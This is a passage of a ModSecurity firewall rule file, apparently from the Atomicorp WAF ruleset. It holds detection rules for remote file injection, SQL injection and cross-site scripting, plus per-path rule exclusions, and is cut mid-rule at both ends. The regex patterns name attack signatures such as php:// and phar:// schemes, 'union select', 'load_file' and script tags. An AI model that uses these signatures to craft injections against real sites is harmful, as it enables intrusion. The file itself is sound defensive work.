(guestbook.pl)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:FOOTER|!ARGS:MESSAGE|!ARGS:header|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340471,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (guestbook.pl)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91054

SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:91055,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91056,t:none,pass,nolog,skipAfter:END_RULES_91056"

SecRule ARGS|!ARGS:/^Dialog/|!ARGS:/^content/|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/^Dialog/|!ARGS:/^content/|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91056

SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:91057,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91058,t:none,pass,nolog,skipAfter:END_RULES_91058"

SecRule ARGS|!ARGS:/description/|!ARGS:keywords|!ARGS:tiny_vals|!ARGS:info|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:Post|!ARGS:text|!ARGS:pagetext|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:/teaser/ "(?:\b(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]] .{,100} update.+set.+=|union all select |\bunion\b.{1,100}?\bselect\b.[a-z][0-9]+ |select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()"  "phase:2,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:370144,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2',logdata:'%{TX.0}',deny,log,auditlog,status:403"

SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:comment|!ARGS:keywords|!ARGS:info|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:wysiwyg|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/|!ARGS:/teaser/ "(?:\b(?:select|grant|delete|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*into.*from|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()" "phase:2,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:370016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',deny,log,auditlog,status:403"
# Rule 340147: Generic XSS filter
SecRule ARGS "!(^(submit\+>>|>>)$)" "phase:2,t:none,t:urlDecodeUni,t:lowercase,capture,id:340247,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0},%{matched_var_name}',deny,log,auditlog,status:403"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/catDesc/|!ARGS:/^blog_/|!ARGS:/^information/|!ARGS:/pDesc/|!ARGS:infoDescription|!ARGS:output|!ARGS:ad|!ARGS:notice|!ARGS:/custom_block/|!ARGS:/google/|!ARGS:/^information_description/|!ARGS:/category_description/|!ARGS:/formcode/|!ARGS:val333|!ARGS:/module/|!ARGS:stylesheet|!ARGS:wysiwyg|!ARGS:/embed/|!ARGS:udesc|!ARGS:description|!ARGS:ldesc|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace"

SecRule ARGS "!(^(submit\+>>|>>)$)"  "phase:2,deny,status:403,log,auditlog,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:340248,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/catDesc/|!ARGS:/^blog_/|!ARGS:/^pdesc/|!ARGS:/^information/|!ARGS:ad|!ARGS:/pDesc/|!ARGS:/module/|!ARGS:/custom_block/|!ARGS:/google/|!ARGS:/embed/|!ARGS:/category_description/|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:wysiwyg|!ARGS:onlineusers|!ARGS:offlineusers|!ARGS:description|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|< ?/?i?frame|\% ?env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multiMatch"

# Rule 340249:  XSS injection
SecRule ARGS "!(^(submit\+>>|>>)$)" "phase:2,chain,t:none,t:removeNulls,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:340249,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}',deny,log,auditlog,status:403"
SecRule REQUEST_URI "!(^/admin/index\.php\?route=module/)" chain
SecRule REQUEST_URI|ARGS|!ARGS:/catDesc/|!ARGS:/^pdesc/|!ARGS:/welcome_module/|!ARGS:onlineusers|!ARGS:offlineusers|!ARGS:stylesheet|!ARGS:stylesheet|!ARGS:/category_description/|!ARGS:notice|!ARGS:wysiwyg|!ARGS:/formcode/|!ARGS:val333|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:description|!ARGS:/embed/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|event|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace"
SecRule REQUEST_URI|ARGS|!ARGS:form[pagina_text]|!ARGS:descripcion|!ARGS:description|!ARGS:message|!ARGS:comments|!ARGS:content "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.{1,100};(?:insert|declare @|varchar) ?|(?:and .{1,100} \(select |\b(?:drop|create)(\w+)table |declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select)" "phase:2,id:340457,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (/admin/index.php exclude)',deny,log,auditlog,status:403"

SecRule REQUEST_URI "!(pagemode=link_index|^/admin/index\.php\?fuse=admin)" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,id:340476,rev:32,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/index.php exclude)',deny,log,auditlog,status:403"
SecRule ARGS|!ARGS:/^go/|!ARGS:/catDesc/|!ARGS:/corvuspay/|!ARGS:config_name|!ARGS:config_owner|!ARGS:/ssl/|!ARGS:/^adjust/|!ARGS:/ULTIMATUMControl/|!ARGS:/youtube/|!ARGS:/web/|!ARGS:u|!ARGS:logo|!ARGS:/popup/|!ARGS:liketext|!ARGS:feed|!ARGS:/^field_/|!ARGS:/ping/|!ARGS:/service/|!ARGS:/img/|!ARGS:pp_path|!ARGS:vidid|!ARGS:/^field_id/|!ARGS:/^smeg_serv/|!ARGS:/website/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/app_update/|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:bic|!ARGS:cubecart4_path|!ARGS:field_vals|!ARGS:osc_path|!ARGS:events_map|!ARGS:xmlpath|!ARGS:homepage|!ARGS:input|!ARGS:email_contents|!ARGS:/link/|!ARGS:page_content|!ARGS:feed_copyright|!ARGS:/image/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:comments|!ARGS:/^opts/|!ARGS:text|!ARGS:code|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:referrer|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:SitePath|!ARGS:Exlink|